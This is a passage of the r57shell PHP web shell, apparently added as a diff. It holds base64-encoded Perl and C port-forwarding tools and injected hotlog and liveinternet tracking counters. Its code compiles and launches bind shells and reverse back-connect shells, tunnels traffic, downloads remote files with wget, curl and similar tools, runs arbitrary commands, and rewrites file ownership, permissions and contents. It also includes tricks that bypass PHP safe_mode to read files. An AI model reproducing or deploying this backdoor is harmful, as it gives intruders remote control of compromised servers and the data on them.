+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+/* --- END datapipe.c ------------------------------------------------------------------------------------------ */
+/* --- datapipe.pl --------------------------------------------------------------------------------------------- */
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+/*** END base64 ------------------------------------------------------------------------------------------------ */
+
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* LOGO + info */
+echo $head;
+echo '</head>
+<body bgcolor="#e4e0d8">
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160>
+<!-- logo -->
+<font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+$si = 3;
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b>ON</b>"):("safe_mode: <b>OFF</b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b>ON (".@curl_version().")</b>"):("<b>OFF</b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on)
+ {
+ $client_api = @function_exists('mysql_get_client_info') ? @mysql_get_client_info() : "";
+ echo "ON ($client_api)</b>";
+ }
+else
+ {
+ echo "OFF</b>";
+ }
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+$df = @ini_get('disable_functions');
+if(empty($df)) echo "NONE</b>"; else echo "$df</b>";
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* display information */
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('/sbin/sysctl -n kern.ostype');
+$bsd2 = ex('/sbin/sysctl -n kern.osrelease');
+$lin1 = ex('/sbin/sysctl -n kernel.ostype');
+$lin2 = ex('/sbin/sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f  = base64_decode($c1);
+$f .= base64_decode($c2);
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* find text */
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* chmod/chown/chgrp */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* make */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* edit file */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name size=85 value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd size=85 value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* save file */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe perl */
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe C */
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* alias execute */
+if (!empty($_POST['alias']))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload */
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload from remote host */
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $p2=which("wget");
+ if(empty($p2)) $p2="wget";
+ $_POST['cmd'] = $p2." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+
+ case fetch:
+ $p2=which("fetch");
+ if(empty($p2)) $p2="fetch";
+ $_POST['cmd']= $p2." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+
+ case lynx:
+ $p2=which("lynx");
+ if(empty($p2)) $p2="lynx";
+ $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case links:
+ $p2=which("links");
+ if(empty($p2)) $p2="links";
+ $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case GET:
+ $p2=which("GET");
+ if(empty($p2)) $p2="GET";
+ $_POST['cmd']= $p2." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case curl:
+ $p2=which("curl");
+ if(empty($p2)) $p2="curl";
+ $_POST['cmd']= $p2." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* command execute */
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=121 rows=15>";
+
+// safe_mode On
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':  // dir listing
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){ // WINDOWS STYLE
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ // UNIX STYLE
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+
+  case 'test2':
+  include($_POST['test2_file']);
+  break;
+
+  case 'test3':
+  $db = @mysql_connect('localhost',$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
